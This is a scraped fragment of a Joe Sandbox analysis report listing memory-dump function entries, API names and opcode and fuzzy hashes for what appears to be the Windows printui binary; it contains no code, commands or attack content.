                              • Source File: 0000000B.00000002.3427166602.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 0000000B.00000002.3427131865.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427235962.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                              • String ID:
                              • API String ID: 642454821-0
                              • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                              • Instruction ID: 3fee72755c71ea6d3962e121ea806243af401c68a42ccf28a2ab0bc38d0a31e0
                              • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                              • Instruction Fuzzy Hash: 53612A35E09607C2FBA0AB11E940279B3AABB48780FA541B5DA4DA73D4DF3CED51C760
                              Function 00007FF763691520 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 75 7ff763691520-7ff763691568 __wgetmainargs
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3427166602.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 0000000B.00000002.3427131865.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427235962.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: __wgetmainargs
                              • String ID:
                              • API String ID: 1709950718-0
                              • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                              • Instruction ID: 6f6967a26596091e6994c03a8db7edf1fd8ce778564b23f2d89dbc9163548b1d
                              • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                              • Instruction Fuzzy Hash: F2E07D74D09647D5F690EB10ED45465B762BB15744BE100B2C58D633A0EE3CAA1ACB20

                              Non-executed Functions

                              Function 00007FF763691A54 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3427166602.00007FF763691000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF763690000, based on PE: true
                              • Associated: 0000000B.00000002.3427131865.00007FF763690000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427200134.00007FF763692000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 0000000B.00000002.3427235962.00007FF763694000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_7ff763690000_printui.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                              • Instruction ID: efcf28e4a50df4f0eeb75178bc7a4dc8ff76e4d23acfde056e8a47e071ba55c0
                              • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                              • Instruction Fuzzy Hash: 3D114D22A05B46CAEB40EF60EC4426873A5FB08758F800A71EB6D57BA4EF7CD964C350